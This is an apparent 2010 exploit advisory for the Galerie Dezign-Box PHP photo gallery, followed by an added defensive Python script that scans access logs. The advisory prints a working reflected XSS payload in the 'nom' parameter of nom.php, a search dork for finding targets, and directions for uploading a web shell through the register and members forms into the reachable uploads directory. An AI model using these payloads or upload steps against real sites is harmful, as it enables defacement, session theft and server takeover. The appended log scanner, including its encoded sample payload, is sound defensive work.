# Title : Galerie Dezign-Box France Multi Vulnerability
# Published : 2010-02-22
# Author : indoushka
========================================================================================
| # Title : Galerie Dezign-Box ? France Multi Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)
| # Web Site : www.iq-ty.com
| # Dork : Script créé par Funewik - Dezign-Box ? France
| # Tested on: Windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)
| # Bug : Multi
====================== Exploit By indoushka =================================
# Exploit :
1- XSS
http://server/galerie/nom.php?id=tufgxab0x2r4xybg527w&nom=<img+src=http://server/dt.gif+onload=alert(213771818860)>
2- Upload Shell
http://server/galerie/membre/register.php (the upload form accepts arbitrary files)
http://server/galerie/membre/membres.php (the upload form accepts arbitrary files)
http://server/galerie/membre/uploads/ (uploaded files are stored and reachable here)
================================ Dz-Ghost Team ========================================
-------------------------------------------------------------------------------------------
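Added example (not part of the original advisory and not the gallery's own code): a log check for defenders that flags requests matching the two issues above, markup in the `nom` parameter of nom.php and non-image files fetched from membre/uploads/. The sample log lines are constructed, and the image-extension allowlist and the tag names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Feb/2010:10:00:01 +0000] "GET /galerie/nom.php?id=abc&nom=Paysage HTTP/1.1" 200 512
203.0.113.9 - - [22/Feb/2010:10:00:07 +0000] "GET /galerie/nom.php?id=abc&nom=%3Cimg+src%3Ddt.gif+onload%3Dalert(1)%3E HTTP/1.1" 200 540
203.0.113.9 - - [22/Feb/2010:10:01:12 +0000] "POST /galerie/membre/register.php HTTP/1.1" 200 901
203.0.113.9 - - [22/Feb/2010:10:01:30 +0000] "GET /galerie/membre/uploads/avatar.php HTTP/1.1" 200 17
198.51.100.4 - - [22/Feb/2010:10:02:00 +0000] "GET /galerie/membre/uploads/photo.jpg HTTP/1.1" 200 20480
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Markup or an inline event handler in a value that should be a plain name.
MARKUP_RE = re.compile(r"[<>]|\bon\w+\s*=", re.I)
# Assumption: a photo gallery should only store these file types.
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}

def classify(line):
    """Return a finding tag for one access-log line, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = url.path.lower()
    # Issue 1: the advisory's XSS is in the `nom` parameter of nom.php.
    if path.endswith("/nom.php"):
        # parse_qs percent-decodes once; double-encoded input is not unwrapped.
        if any(MARKUP_RE.search(v) for v in parse_qs(url.query).get("nom", [])):
            return "xss-nom"
    # Issue 2: anything fetched from membre/uploads/ that is not purely an image.
    if "/membre/uploads/" in path:
        name = path.rsplit("/", 1)[1]
        # Check every extension so names like x.php.jpg are flagged too.
        exts = name.split(".")[1:]
        if name and (not exts or any(e not in IMAGE_EXTS for e in exts)):
            return "non-image-in-uploads"
    return None

def scan(log_text):
    """Return (line_number, tag) for every suspicious line."""
    return [(n, tag) for n, line in enumerate(log_text.splitlines(), 1)
            if (tag := classify(line))]

if __name__ == "__main__":
    for n, tag in scan(SAMPLE_LOG):
        print(n, tag)
```

A hit on `non-image-in-uploads` with a 200 response means the file exists in the web-reachable uploads directory and should be inspected and removed.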